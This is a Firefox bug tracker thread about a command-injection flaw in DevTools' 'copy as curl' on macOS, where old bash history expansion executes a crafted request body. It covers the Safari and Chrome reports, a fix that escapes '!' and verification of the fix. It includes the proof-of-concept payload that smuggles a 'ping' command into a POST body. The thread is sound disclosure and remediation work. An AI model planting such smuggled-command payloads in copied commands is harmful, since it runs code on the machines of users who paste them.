RCE via "copy as curl" on mac
Categories: DevTools :: Netmonitor, defect
Tracking: firefox-esr60 wontfix, firefox64 wontfix, firefox65 wontfix, firefox66 verified
People: Reporter: watashiwaher, Assigned: bgrins
References
Details: 4 keywords, Whiteboard: [reporter-external] [client-bounty-form] [verif?][post-critsmash-triage]][adv-main66+]
Attachments: 2 files
Description (comment 0)

VULNERABILITY DETAILS

Copy-pasting of curl requests from Firefox can produce RCE in MacOS. For example, we have such JS code:

    fetch('https://google.com', {'body':'\'!ls:q:gs|ls|;ping 8.8.8.8;|', method:'POST'})

If we copy it as curl we will get such a bash command:

    curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'!ls:q:gs|ls|;ping 8.8.8.8;|'

The interesting part is here:

    $'\'!ls:q:gs|ls|;ping 8.8.8.8;|'

It is calling the following command:

    ping 8.8.8.8

But how? The problem is that mac uses an old bash, which lacks some updates, and the current mac version of bash has a problem with bash history expansions. Our bash command will actually be interpreted in an interesting way if one of our previous commands contained 'ls'. So we will have such a request:

    curl 'https://google.com/' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:64.0) Gecko/20100101 Firefox/64.0' -H 'Accept: */*' -H 'Accept-Language: en-US,en;q=0.5' --compressed -H 'content-type: text/plain;charset=UTF-8' -H 'origin: null' -H 'DNT: 1' -H 'Connection: keep-alive' --data $'\'';ping 8.8.8.8;''

The interesting part is here:

    $'\'';ping 8.8.8.8;''

So you see that here our string is transformed into executable bash code.

WHAT HAPPENED

First of all, when I found this, I asked the bash team to fix it, but they told me that it is not a vulnerability at all, so there is no CVE, that it is fixed in newer bash (it is true), and that they won't fix it for old versions. Okay, I sent this information to Apple, and they fixed it... But I was slow and didn't check their fix. Later I checked the fix, and the fix was strange... They fixed the Safari inspector. So it looks like Apple actually doesn't think that it is a problem in Bash, as I understand it.

So I am sending this report to the Firefox team.

VERSION

Works only in MacOS in any version of Firefox.

REPRODUCTION CASE

I attached an archive with a video showcase and an HTML file.
Comment 1 • 6 years ago

Thanks for this report. Does this also work in Chrome's devtools, and did you report to them (if so, can you provide the URL)? Do you know if there is a (public or private) URL for the safari/mac "fix"? Honza, are you the right person to look at this?
Comment 2 • 6 years ago

> Does this also work in Chrome's devtools, and did you report to them

Yes it works, but I made the report yesterday for both Firefox and Chrome, so it is not public yet.

> Do you know if there is a (public or private) URL for the safari/mac "fix"?

For Safari: https://support.apple.com/en-us/HT208324

    WebKit Web Inspector
    Available for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.2
    Impact: Processing maliciously crafted web content may lead to arbitrary code execution
    Description: A command injection issue existed in Web Inspector. This issue was addressed through improved escaping of special characters.
    CVE-2017-7161: Mitin Svyat

I looked at the fix (sorry for being so late). In Safari the interesting part is transformed into:

    $'\'\041ls:q:gs|ls|;ping 8.8.8.8;|'
Comment 3 • 6 years ago

(In reply to potatoe from comment #2)
> "Does this also work in Chrome's devtools, and did you report to them"
> Yes it works, but I made report yesterday for both: Firefox and Chrome. So
> it is not public yet.

OK, can you provide the link for completeness? We may be able to coordinate with Chrome, though if the fix for Safari is already public it might not matter very much anymore...
Comment 4 • 6 years ago

Here is a link (but it is private now). https://bugs.chromium.org/p/chromium/issues/detail?id=919356
Comment 5 (Assignee) • 6 years ago

I'm assuming this was the fix in Web Inspector: https://github.com/WebKit/webkit/commit/5736bda9ad07609ef386e2d5a7f5308c17b98586.

I can't find any reference to a commit from https://support.apple.com/en-us/HT208324, or a commit with the CVE ID.
Comment 6 (Assignee) • 6 years ago

Scanning our netmonitor code for "copy as curl", this looks like the relevant function: https://searchfox.org/mozilla-central/rev/b29663c6c9c61b0bf29e8add490cbd6bad293a67/devtools/client/shared/curl.js#348
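As an added illustration of the escaping approach the thread converges on (not Firefox's own devtools/client/shared/curl.js and not the WebKit commit, both of which are only linked above), the following JavaScript builds a bash ANSI-C quoted string for a generated curl command. The point is the one the reporter's payload and the Safari output `$'\'\041...'` make: in an interactive bash, history expansion runs on the raw command line before the `$'...'` literal is parsed, so a bare `!` must never reach the shell, and writing it as the octal escape `\041` keeps the byte while removing the trigger. The request object, URL and `toCurl` helper are constructed for this example; unlike Firefox's output, it wraps every argument in `$'...'` for uniformity.

```javascript
// Added example (hypothetical helper, not the Firefox or WebKit code).
// Produce a bash $'...' (ANSI-C quoted) literal in which no character
// can change the meaning of the surrounding command line:
//   \  -> \\        '  -> \'        !  -> \041 (octal, defeats history expansion)
//   newline/tab/CR and other control bytes -> \n, \t, \r or \xHH
function escapeForBashAnsiC(value) {
  let out = "";
  for (const ch of value) {
    const code = ch.codePointAt(0);
    if (ch === "\\") {
      out += "\\\\";
    } else if (ch === "'") {
      out += "\\'";
    } else if (ch === "!") {
      // History expansion scans the raw line for '!', so emit the byte as
      // an octal escape; bash decodes \041 back to '!' only when it
      // evaluates the $'...' literal, after the expansion pass is over.
      out += "\\041";
    } else if (ch === "\n") {
      out += "\\n";
    } else if (ch === "\r") {
      out += "\\r";
    } else if (ch === "\t") {
      out += "\\t";
    } else if (code < 0x20 || code === 0x7f) {
      out += "\\x" + code.toString(16).padStart(2, "0");
    } else {
      out += ch;
    }
  }
  return "$'" + out + "'";
}

// Render a minimal copy-as-curl line from a plain request object. Every
// attacker-controlled field (URL, header values, body) goes through the
// same escaper; nothing is concatenated into the command unquoted.
function toCurl(request) {
  const parts = ["curl", escapeForBashAnsiC(request.url)];
  for (const [name, val] of Object.entries(request.headers || {})) {
    parts.push("-H", escapeForBashAnsiC(`${name}: ${val}`));
  }
  if (request.body !== undefined) {
    parts.push("--data", escapeForBashAnsiC(request.body));
  }
  return parts.join(" ");
}

// Constructed sample request: a POST body carrying the characters at issue
// (a leading quote, a '!' history trigger, shell metacharacters).
const SAMPLE_REQUEST = {
  url: "https://example.test/",
  headers: { "content-type": "text/plain;charset=UTF-8" },
  body: "'!ls:q:gs|ls|;true;|",
};

// Usage: the generated line contains "--data $'\'\041ls:q:gs|ls|;true;|'"
// and no bare '!' anywhere, so pasting it into an interactive bash on an
// old macOS cannot trigger history expansion.
console.log(toCurl(SAMPLE_REQUEST));
```

Two caveats for anyone reusing this: `$'...'` is a bash/zsh/ksh extension rather than POSIX sh, so a command built this way is not portable to plain `sh`; and history expansion is only active in interactive shells, which is exactly why the bug surfaces on paste into a terminal and not when the same line is run from a script.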
Comment 7 (Assignee) • 6 years ago

Comment 8 (Assignee) • 6 years ago

I've ported over the WebInspector fix in attachment 9036477 [details]
Comment 9 • 6 years ago

https://hg.mozilla.org/integration/autoland/rev/10d517464fb1ba1ea73ddcaea039e32f4f4116f6
https://hg.mozilla.org/mozilla-central/rev/10d517464fb1
Comment 10 • 6 years ago

Too late for Fx65 in light of tomorrow's RC gtb. Let's let this ride the trains with 66.
Comment 11 • 5 years ago

I have managed to reproduce the issue mentioned in comment 0 using Firefox 65.0.1 (BuildId:20190211233335).
This issue is verified fixed using Firefox 66.0b9 (BuildId:20190218131312) on macOS 10.12.6
Comment 12 (Assignee) • 5 years ago

Daniel, do you think we should uplift this to ESR for the 60.6 release?
Comment 13 • 5 years ago

I don't feel strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?
Comment 14 (Assignee) • 5 years ago

(In reply to Daniel Veditz [:dveditz] from comment #13)
> I don't feel strongly about it. It's a simple fix that release-drivers would probably take, but how many people are doing web development on ESR, let alone on ESR on mac?

That's a good point. Given that this is DevTools + OSX only, I'm leaning towards not taking the resources required to get this uplifted and tested onto 60.
Comment 15 • 5 years ago

Is the report to Bash in a public report somewhere? I'd like to link to it.